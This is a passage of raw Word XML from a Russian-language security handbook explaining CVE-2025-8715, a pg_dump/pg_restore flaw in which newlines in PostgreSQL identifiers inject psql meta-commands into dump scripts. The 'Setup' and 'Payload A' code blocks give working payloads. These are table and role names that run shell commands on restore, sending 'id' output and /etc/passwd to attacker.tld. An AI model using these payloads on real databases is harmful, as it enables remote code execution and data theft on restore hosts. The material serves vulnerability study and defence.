        <w:t xml:space="preserve"> — стандарт line endings (для контекста log-handling).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.12.3 Newline в идентификаторах (R25, CVE-2025-8715)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уязвимый код — pg_dump + pg_restore pipeline.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> В отличие от 3.12.1/3.12.2, уязвимая поверхность здесь — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не application-эндпоинт</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, а </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">chain через persistent state в БД</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: атакующий создаёт объект с опасным именем, payload активируется при последующем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pg_restore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на другом хосте.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Суть</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL quoted-identifier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допускает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">любые байты внутри</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, включая newline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tab, нулевые байты в некоторых вариантах. Это часть спецификации (Lexical Structure §4.1.1): *"Quoted identifiers can contain any character, except the character with code zero."*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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сериализует объекты БД в текстовый script для последующего restore через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pg_restore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). В этом script-е имена объектов вставляются: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Как часть SQL-команд</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TABLE "&lt;name&gt;"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INSERT INTO "&lt;name&gt;" ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Quoted-identifier-форма; PG-парсер при restore обрабатывает корректно.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Как часть SQL-комментариев</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Name: &lt;name&gt;; Type: TABLE; Schema: public; Owner: &lt;owner&gt;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пишет такие comment-блоки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">перед</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> каждым CREATE/COPY, для удобочитаемости. Здесь имя — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">внутри `--`-комментария</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Если имя содержит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оно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">разрывает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-комментарий внутри dump-script. Текст после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попадает в SQL как активная команда. Если атакующий контролирует имя — он контролирует injected SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Исторический контекст:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Эту уязвимость нашли в 2012 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2012-0868</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), исправили. В 2025 обнаружили </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">регрессию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CVE-2025-8715, R25) — fix покрыл не все случаи (специфичные для plpgsql-функций и для interaction с pg_restore meta-commands).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Patch-окно (R25):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">17.6, 16.10, 15.14, 14.19, 13.22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (август 2025).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup (attacker's prerequisite)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Атакующий должен иметь право создать объект в БД. Минимальное —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 на любой схеме.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Создание объекта с newline в имени:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Атакующий с правом CREATE ROLE:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE ROLE "evil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\! id &gt; /tmp/pwned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--" LOGIN PASSWORD 'x';</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Или CREATE TABLE на своей schema:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TABLE "public"."evil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\! curl http://attacker.tld/exfil?$(id | base64)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--" (id int);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Имя содержит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после которого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psql meta-command (см. 3.9.7). Внутри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это попадёт в комментарий-блок:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="10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Name: evil</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\! curl http://attacker.tld/exfil?$(id | base64)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--; Type: TABLE; Schema: public; Owner: evil_user</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pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — RCE при psql-restore через `\!`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: атакующий имеет </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 на schema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(или собственную user-schema; PG ≤ 14 — public по умолчанию).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TABLE "public"."innocent_table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\! id &gt; /tmp/pg_pwned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\echo backdoor active</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\! curl -X POST http://attacker.tld/log -d \"@/etc/passwd\"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\echo done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--" (data text);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DBA / CI запускает:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_dump -d production &gt; /tmp/backup.sql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># ... перенос на staging-host ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psql -d staging -f /tmp/backup.sql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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/tmp/backup.sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> будет:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="10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Name: innocent_table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\! id &gt; /tmp/pg_pwned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\echo backdoor active</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\! curl -X POST http://attacker.tld/log -d "@/etc/passwd"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\echo done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--; Type: TABLE; Schema: public; Owner: evil_user</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TABLE public."innocent_table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
